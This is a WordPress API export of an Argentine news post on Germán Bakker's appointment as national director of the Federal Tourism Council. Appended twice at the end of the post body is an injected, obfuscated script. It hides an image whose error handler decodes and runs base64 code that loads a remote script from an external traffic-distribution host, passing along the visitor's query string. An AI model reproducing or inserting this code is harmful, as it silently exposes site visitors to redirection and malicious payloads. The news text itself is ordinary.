{"id":4814,"date":"2025-02-10T10:41:57","date_gmt":"2025-02-10T13:41:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4814"},"modified":"2025-08-13T23:41:04","modified_gmt":"2025-08-14T02:41:04","slug":"el-neuquino-german-bakker-sera-director-nacional-del-cft","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4814","title":{"rendered":"El neuquino Germ\u00e1n Bakker ser\u00e1 director nacional del CFT"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-839821d4207c8a55c8a3c45484ea173d\" style=\"background-color:#0669a2\"><em>Particip\u00f3 de la reuni\u00f3n encabezada por Scioli y D\u00edaz Gilligan en la que se avanz\u00f3 en la incorporaci\u00f3n activa del Consejo a la agenda internacional de eventos del Inprotur.<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, particip\u00f3 de la reuni\u00f3n del Consejo Federal de Turismo en la que se avanz\u00f3 en la&nbsp;<strong>incorporaci\u00f3n activa del CFT a la agenda internacional de eventos del Inprotur<\/strong>, con al menos un representante por regi\u00f3n, y la definici\u00f3n del calendario de asambleas previstas para el 2025.<\/p>\n\n\n\n<p>Del encuentro -en modalidad virtual- encabezado por el presidente del CFT,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>, particip\u00f3 el neuquino&nbsp;<strong>Germ\u00e1n Bakker<\/strong>, quien ser\u00e1 el director nacional del CFT.<\/p>\n\n\n\n<p>El temario de la reuni\u00f3n tambi\u00e9n incluy\u00f3 cuestiones vinculadas al pr\u00f3ximo lanzamiento del pasaporte de la&nbsp;<strong>Ruta Sanmartiniana en Palacio San Mart\u00edn<\/strong>&nbsp;y la presentaci\u00f3n de la&nbsp;<strong>Gu\u00eda de Inversiones en la Argentina<\/strong>, entre otros puntos.<\/p>\n\n\n\n<p>Los presidentes de los Entes Regionales&nbsp;<strong>Gabriela Testa<\/strong>&nbsp;(Cuyo),&nbsp;<strong>Gustavo Fern\u00e1ndez Capiet<\/strong>&nbsp;(Patagonia),&nbsp;<strong>Silvia Segovia<\/strong>&nbsp;(Litoral) y&nbsp;<strong>Evangelina Quarin<\/strong>&nbsp;(NOA) tambi\u00e9n asistieron al encuentro, del que particip\u00f3 la secretaria ejecutiva del Inprotur,&nbsp;<strong>Natalia Recio<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:276px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Particip\u00f3 de la reuni\u00f3n encabezada por Scioli y D\u00edaz Gilligan en la que se avanz\u00f3 en la incorporaci\u00f3n activa del Consejo a la agenda internacional de eventos del Inprotur. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, particip\u00f3 de la reuni\u00f3n del Consejo Federal de Turismo en la que se avanz\u00f3 en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4815,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-4814","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4814"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4814"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4814\/revisions"}],"predecessor-version":[{"id":6577,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4814\/revisions\/6577"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4815"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4814"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}